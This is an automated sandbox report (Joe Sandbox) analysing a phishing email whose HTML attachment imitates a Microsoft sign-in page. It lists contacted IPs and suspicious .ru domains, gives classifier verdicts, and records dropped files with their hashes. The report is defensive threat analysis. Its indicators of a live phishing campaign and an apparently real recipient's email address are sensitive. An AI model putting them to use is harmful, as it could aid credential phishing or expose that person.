                                                    54113FASTLYUSfalse
                                                    52.113.194.132
                                                    unknownUnited States
                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    104.17.24.14
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    142.250.185.67
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    34.104.35.123
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    1.1.1.1
                                                    unknownAustralia
                                                    13335CLOUDFLARENETUSfalse
                                                    216.58.212.138
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    172.217.18.4
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    104.18.95.41
                                                    challenges.cloudflare.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    140.82.121.4
                                                    github.comUnited States
                                                    36459GITHUBUSfalse
                                                    13.32.145.9
                                                    d2vgu95hoyrpkh.cloudfront.netUnited States
                                                    16509AMAZON-02USfalse
                                                    192.229.133.221
                                                    cs837.wac.edgecastcdn.netUnited States
                                                    15133EDGECASTUSfalse
                                                    216.58.206.68
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    192.0.78.26
                                                    href.liUnited States
                                                    2635AUTOMATTICUSfalse
                                                    151.101.2.137
                                                    code.jquery.comUnited States
                                                    54113FASTLYUSfalse
                                                    104.21.44.138
                                                    8flx.oapuot.ruUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    239.255.255.250
                                                    unknownReserved
                                                    unknownunknownfalse
                                                    188.114.97.3
                                                    t0ca.maktated.ruEuropean Union
                                                    13335CLOUDFLARENETUSfalse
                                                    52.109.28.47
                                                    unknownUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    188.114.96.3
                                                    unknownEuropean Union
                                                    13335CLOUDFLARENETUSfalse
                                                    172.67.70.233
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    104.17.25.14
                                                    cdnjs.cloudflare.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    172.217.16.132
                                                    www.google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    52.109.76.144
                                                    unknownUnited States
                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    IP
                                                    192.168.2.17
                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                    Analysis ID:1500751
                                                    Start date and time:2024-08-28 21:42:22 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:23
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • EGA enabled
                                                    Analysis Mode:stream
                                                    Analysis stop reason:Timeout
                                                    Sample name:phish_alert_iocp_v1.4.48 (43).eml
                                                    Detection:MAL
                                                    Classification:mal68.phis.winEML@32/68@60/310
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .eml
                                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                                    • Excluded IPs from analysis (whitelisted): 52.113.194.132, 52.109.28.47, 2.19.126.147, 2.19.126.144, 2.19.126.151, 2.19.126.148, 2.19.126.160
                                                    • Excluded domains from analysis (whitelisted): ecs.office.com, omex.cdn.office.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, eur.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, uks-azsc-000.roaming.officeapps.live.com, s-0005.s-msedge.net, ecs.office.trafficmanager.net, omex.cdn.office.net.akamaized.net, a1864.dscd.akamai.net
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtSetValueKey calls found.
                                                    • VT rate limit hit for: phish_alert_iocp_v1.4.48 (43).eml
                                                    InputOutput
                                                    URL: Email Model: jbxai
                                                    {
                                                    "brand":["unknown"],
                                                    "contains_trigger_text":false,
                                                    "prominent_button_name":"unknown",
                                                    "text_input_field_labels":["unknown"],
                                                    "pdf_icon_visible":false,
                                                    "has_visible_captcha":false,
                                                    "has_urgent_text":false,
                                                    "has_visible_qrcode":false}
                                                    URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/RA2DLVFO/VM-20240828-03940.html#?em=sschultz@firstfedweb.com Model: jbxai
                                                    {
                                                    "brand":["CLOUDFLARE"],
                                                    "contains_trigger_text":false,
                                                    "prominent_button_name":"unknown",
                                                    "text_input_field_labels":["unknown"],
                                                    "pdf_icon_visible":false,
                                                    "has_visible_captcha":false,
                                                    "has_urgent_text":false,
                                                    "has_visible_qrcode":false}
                                                    URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/RA2DLVFO/VM-20240828-03940.html#?em=sschultz@firstfedweb.com Model: jbxai
                                                    {
                                                    "brand":["CLOUDFLARE"],
                                                    "contains_trigger_text":false,
                                                    "prominent_button_name":"unknown",
                                                    "text_input_field_labels":["unknown"],
                                                    "pdf_icon_visible":false,
                                                    "has_visible_captcha":false,
                                                    "has_urgent_text":false,
                                                    "has_visible_qrcode":false}
                                                    URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/RA2DLVFO/VM-20240828-03940.html#?em=sschultz@firstfedweb.com Model: jbxai
                                                    {
                                                    "brand":["unknown"],
                                                    "contains_trigger_text":false,
                                                    "prominent_button_name":"unknown",
                                                    "text_input_field_labels":["unknown"],
                                                    "pdf_icon_visible":false,
                                                    "has_visible_captcha":false,
                                                    "has_urgent_text":false,
                                                    "has_visible_qrcode":false}
                                                    URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/RA2DLVFO/VM-20240828-03940.html#?em=sschultz@firstfedweb.com Model: jbxai
                                                    {
                                                    "brand":["Microsoft"],
                                                    "contains_trigger_text":true,
                                                    "prominent_button_name":"Sign in",
                                                    "text_input_field_labels":["Enter password",
                                                    "Forgot my password"],
                                                    "pdf_icon_visible":false,
                                                    "has_visible_captcha":false,
                                                    "has_urgent_text":false,
                                                    "has_visible_qrcode":false}
                                                    URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/RA2DLVFO/VM-20240828-03940.html#?em=sschultz@firstfedweb.com Model: jbxai
                                                    {
                                                    "brand":["unknown"],
                                                    "contains_trigger_text":false,
                                                    "prominent_button_name":"unknown",
                                                    "text_input_field_labels":["unknown"],
                                                    "pdf_icon_visible":false,
                                                    "has_visible_captcha":false,
                                                    "has_urgent_text":false,
                                                    "has_visible_qrcode":false}
                                                    URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/RA2DLVFO/VM-20240828-03940.html#?em=sschultz@firstfedweb.com Model: jbxai
                                                    {
                                                    "phishing_score":8,
                                                    "brand_name":"Microsoft",
                                                    "reasons":"The URL is a local file path and not a standard web domain,
                                                     which is unusual and raises suspicions. Additionally,
                                                     the presence of the 'file://' protocol and the use of a local file path as a domain name are not typical of a legitimate Microsoft login page."}
                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):231348
                                                    Entropy (8bit):4.386887053196295
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:080919AC5ECC44171EEE2953D086E459
                                                    SHA1:96F0DE4432A5F0F76AD3385CB2FCF282406733AB
                                                    SHA-256:F643F5EAD55F1E3682C2FD473BC74DF9303EB46A26860F1D6C4683647FD37C78
                                                    SHA-512:6CE57CD905B28513AAD8BDBB1A73B4F7AC747E2F834A5048B1650EAA6BD2DA41054159F50844CC46FB1644DACA0174919B3B525600E807EE898BDEF5BBE03574
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:TH02...... .pa.o........SM01X...,.....xo............IPM.Activity...........h...............h............H..hd........[.*...h........`X..H..h\tor ...AppD...h ...0..........h.C?C...........h........_`.k...h.B?C@...I.+w...h....H...8..k...0....T...............d.........2h...............k..............!h.............. h..`..........#h....8.........$h`X......8....."hH.............'h..............1h.C?C<.........0h....4.....k../h....h......kH..h....p...d.....-h .............+hd@?C....X................... ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000....Microsoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..
                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):322260
                                                    Entropy (8bit):4.000299760592446
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CC90D669144261B198DEAD45AA266572
                                                    SHA1:EF164048A8BC8BD3A015CF63E78BDAC720071305
                                                    SHA-256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
                                                    SHA-512:16F8A8A6DCBAEAEFB88C7CFF910BCCC71B76A723CF808B810F500E28E543112C2FAE2491D4D209569BD810490EDFF564A2B084709B02963BCAF6FDF1AEEC59AC
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:51253fe60063c31af0d295afb42228b0:v2:2:1:1590:2:8479:76bd602437550e98c9043d06a55186ab7d95dea5a0e935a599f73e62a8c9b158e0afcb19351f6c353940c06a38172b94d18c02cf92bb8a80184eccca0392b259ab3e71dae73e491c7941997cb36ad4a198661f622dad478d840f66d530a0dde78acea3367f91fff62fbb3dc18faff0c708ad30edef5bea8b22c5fd782b770d8993386eaa784fd19a3c3e1db3b537b1a94d3d4fbd46f8df8fddf6d16611969fe0a97c50e0f3ac24750c93257cf5c161184aa7385800c87d803b339632a3d8ec7fe17a0afd83ce9e9d0e3f7b8d579637928a811f1f7e6d1887df2ddc7d4f752c4d600235e426c92c7bf8a1362f95457998cc0e5d4261f0efa4fada0f866dbcefb407dacab7a2914e91c2f08200f38c2d9d621962145b1464b0f204b326118a53ecdcab22bff005fdd5257c99a6dc51ac0600a49f2ef782396987e78c08b846dad5db55e8ccefffc64863bc2c3e90b95a09d25d0814a848c98fe01a82d4e30e6682dd546e12c45ca0d280a45295ab4bd632dafb070edfdc3c9e38313d5aeb195972986f8011b66817028fd8c78b67a0ac7e780eecc3fb6a31f5a025b8a9a3db278a98c0696aeaac739b18688b0f9c7d751bba02cc5f4e41853fb119b3c0c915059aaa92971244a1989124f12881ca88e6410df70b793a2c3a736ff4
                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):10
                                                    Entropy (8bit):2.4464393446710155
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2ED81A7E64ACB98B6A4C800904C3F936
                                                    SHA1:ED0BC5D26337CD60157B9DB777ED0151B5A031EB
                                                    SHA-256:49E03FE22A4E2091748DD67BFF10DECAD521A7F0C1804AC065AEF5155E938F93
                                                    SHA-512:8378B9663C1DBDB28ABD17DDFA7F36DB812201F0F050B1FA18D01EC36F116EE2307B5AC7F8A7D74BBEAAB5C93E9C7DBCC91F2A8940755F64D52B45DF5386593F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:1724874175
                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                    File Type:SQLite 3.x database, last written using SQLite version 3034001, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):4096
                                                    Entropy (8bit):0.09304735440217722
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D0DE7DB24F7B0C0FE636B34E253F1562
                                                    SHA1:6EF2957FDEDDC3EB84974F136C22E39553287B80
                                                    SHA-256:B6DC74E4A39FFA38ED8C93D58AADEB7E7A0674DAC1152AF413E9DA7313ADE6ED
                                                    SHA-512:42D00510CD9771CE63D44991EA10C10C8FBCF69DF08819D60B7F8E7B0F9B1D385AE26912C847A024D1D127EC098904784147218869AE8D2050BCE9B306DB2DDE
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:SQLite format 3......@ ..........................................................................K.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                    File Type:SQLite Rollback Journal
                                                    Category:dropped
                                                    Size (bytes):4616
                                                    Entropy (8bit):0.13784977103055013
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:22177DEF15FB53E08791E43E14BB7C3E
                                                    SHA1:145A87B2225A616A62FE07F19EB02269AD67BA52
                                                    SHA-256:5B4EF89A5BB0119134ABB10CEB24B1B471264DCF7CF7677434C18B889D740B2F
                                                    SHA-512:E84D2C097BB48887145A56B34B9811540CBDA91131F5C272C1E804AB4BFF9B4409FA12C7DB45D1EA940A2C4F4F83D9D093F9FAFF97484FA177DD6434E64AAFF2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.... .c.....*.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................K.................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):32768
                                                    Entropy (8bit):0.04486648292292196
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1E6EBAA8E765CB4DD3EC0E3E7FFBD395
                                                    SHA1:7B215BD825992AC48B6BFEF757E2E9EB2F44FF89
                                                    SHA-256:7FC32E58236F686EB702F0A801035A9C6A6EF340339E437003E19973EAA9A285
                                                    SHA-512:95E521E59C6E1B1397A4F3A0B39716BC77158693E0780F8B9F63C1889282BD1C5C9338A3FEEDA4542B6D1E2DF821E6DE988DB7FFC5DFCE89D5A2F6D684D3FCA7
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:..-......................s..i?...[.46.)P....n....-......................s..i?...[.46.)P....n..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                    File Type:SQLite Write-Ahead Log, version 3007000
                                                    Category:modified
                                                    Size (bytes):45352
                                                    Entropy (8bit):0.39456827104179387
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8FFA91D353766BA770235481DE1B7B46
                                                    SHA1:ACE0C6C0F9653727970FFB70ED4F452DC4672664
                                                    SHA-256:103AAAE5F9520FF0EB5C6BD53D60FB7F4E18623D1203D471C01B2A870DDB0B36
                                                    SHA-512:B0E5BA65672DA0D1A1469AB743CBEFB2A17449DAF7D62CB1C8A7CA0EC0B4E7442525BFFD5284A69F1A892A00998DB2A34C0BF7952F65184202AC47FD85CE5495
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:7....-............[.46.).B..@.n..........[.46.)*...9M..SQLite format 3......@ ..........................................................................K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                    File Type:ASCII text, with very long lines (28741), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):20971520
                                                    Entropy (8bit):0.16158307287630977
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B535985AAA172821E7529FAA5D6741BF
                                                    SHA1:64A8ABBE2087EC51810C671A1FD419B3BB0774DC
                                                    SHA-256:7C05C6A293D8EC28010E2CA4F6ECE601CBBFA69A035063DB4C2D558B6A7F5A10
                                                    SHA-512:CB1A58DE2DD7A0B51514C7E0B2C3A08443D06F33C8D51227A54018E946CD38D970ABFD1E5F9DCDFC490457D7D9F5316A7F001685E3C364CC1DFC2EE6EF2B7117
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..08/28/2024 19:42:51.971.OUTLOOK (0x1B60).0x1B64.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":25,"Time":"2024-08-28T19:42:51.971Z","Contract":"Office.System.Activity","Activity.CV":"sBVjZqYihku8+7FbwD1VZQ.4.11","Activity.Duration":12,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...08/28/2024 19:42:51.987.OUTLOOK (0x1B60).0x1B64.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":27,"Time":"2024-08-28T19:42:51.987Z","Contract":"Office.System.Activity","Activity.CV":"sBVjZqYihku8+7FbwD1VZQ.4.12","Activity.Duration":10796,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajor
                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):20971520
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                    SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                    SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                    SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):110592
                                                    Entropy (8bit):4.494756970949422
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E046240F36ABA68EEEFD7942779D1E77
                                                    SHA1:9F33FBAA581372D33D03B80B65559092E15BF31D
                                                    SHA-256:C23CE65B15A0687C5EA3908090004FE34F208392686D46D25DD922E1B8CD81B5
                                                    SHA-512:E56B583745115E3B7A0AD3740D514DE2DDF9682040D232BFCA6349C9E91F1F52A713CBC9E6F3944C2E6EEC66CDDB781A966E3CC798842B8D1911A9AFF9EB4C11
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:............................................................................d...d...`...}$.x....................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1................................................................Y..........}$.x............v.2._.O.U.T.L.O.O.K.:.1.b.6.0.:.2.0.4.5.8.1.0.7.5.8.d.5.4.5.7.6.a.a.f.0.e.a.2.6.d.a.b.0.4.e.b.e...C.:.\.U.s.e.r.s.\.t.o.r.r.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.0.8.2.8.T.1.5.4.2.5.1.0.7.1.5.-.7.0.0.8...e.t.l...........P.P.d...`...}$.x....................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):30
                                                    Entropy (8bit):1.2389205950315936
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:3DB4C859C6704F8581EED0030895A53D
                                                    SHA1:376BEC6E752ED7A09D8A267EFA7EB2B2776E3053
                                                    SHA-256:232922E0C202974694CAA4048F181EE3E4DAFFBD7D2EDFDC73C92F6F75614362
                                                    SHA-512:6897A88E9370481D2375F577666D03466B60DA705621AABC516BA533C1FC671182FC7935778EF0DFF3FC66DB755FA02555984FD722522F10E6DAD760CF90D297
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:....;.........................
                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                    Category:dropped
                                                    Size (bytes):16384
                                                    Entropy (8bit):0.6696773548293601
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2CC85664BEA1C2BE83F6A33C46B7250C
                                                    SHA1:AC209B66F749D6FCAC999E962F85CCAA34A3B050
                                                    SHA-256:61CC917802D0698B7E2125F01A61334BA01FE6FC0881A76589501E9A981E7197
                                                    SHA-512:18FF37A5D0E2B5D08CD9F022264A53CF765E73F33CD543A2B67EB683F4856EACD8282A75BBA33F4342AA46ACCF4100A801F6C3256281F415CB7513922D79D69F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Aug 28 18:43:02 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2677
                                                    Entropy (8bit):3.9943163949440508
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:228622FFFFB021B206E7C22A082E354A
                                                    SHA1:15C4FA3E7DBEFD548B21A81221D22A96CBE0CA67
                                                    SHA-256:764277E7184BB3C058D79E37CA6E581D191B80291FE9AE8214E7833135402911
                                                    SHA-512:A1A8F0424CA9853802AF2DF59BD77505623A3254E618E4A3D95D2F4599EBE2B651028AFA7144CB13C26BFAD377206883C96CE968480625B43C59BC7A9CDBBBE1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,......]~........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.YS.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y`.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y`.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y`............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Ya............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............V?......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Aug 28 18:43:02 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2679
                                                    Entropy (8bit):4.006543157483748
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:70E028613B55037F283B244C58177F74
                                                    SHA1:942EAF81A5A81416552F310115EDAB6AE22AECB0
                                                    SHA-256:89EC6BE350754CBBC972140EDF4B7937EB9861F820AD2FD60C1CF75944009348
                                                    SHA-512:3AF97B99F1FCFAD33E7B416AFA077C7F6A7BEB9EAB783E6DE9EB4C0D3FD01EB9C49E55A410B4B7E8BEFC0CC6FCFFE4933FAA0A11FA52B948F570D17B29F24335
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,....&.O~........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.YS.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y`.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y`.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y`............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Ya............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............V?......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2693
                                                    Entropy (8bit):4.016706189984091
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:983F1D0C2242717FCD32F0E8D8DE802F
                                                    SHA1:8B34569ACD511791C4D4CBABBEAC6877854A4EB4
                                                    SHA-256:20C2963B70C8B9523C36410030FDFDEFC7C8251AA2CC613AD1278B37B59B1BD0
                                                    SHA-512:A3E4767EA5D95ADEB357AE829554B2571F1FB188F4D838497F0C4FFE8DC2010C3706708D5E6A8E5612185AFCFA46AED40F136C1294E120DB56F8DB601905E526
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.YS.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y`.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y`.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y`............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............V?......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Aug 28 18:43:02 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2681
                                                    Entropy (8bit):4.005517604522171
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:5F24244EFE7CB7735FFE962C4D162274
                                                    SHA1:C55C2D38F6B4CB39F6242CCE3C4CAF171AC89B8D
                                                    SHA-256:F359A5287CE6F5F4E298FCC3FDDE126BD5AAC0842ACA3434576D8030B048945B
                                                    SHA-512:93612E45B4F3E45F9C65E53D1ACEBD2382F77DB13298574EEA197096F38D4CA0803F15294C024FE87C3C0C0CF4F3EDCB91C5E8D8D536F0C02BDF2D547D12B990
                                                    Malicious:false
                                                    Reputation:unknown
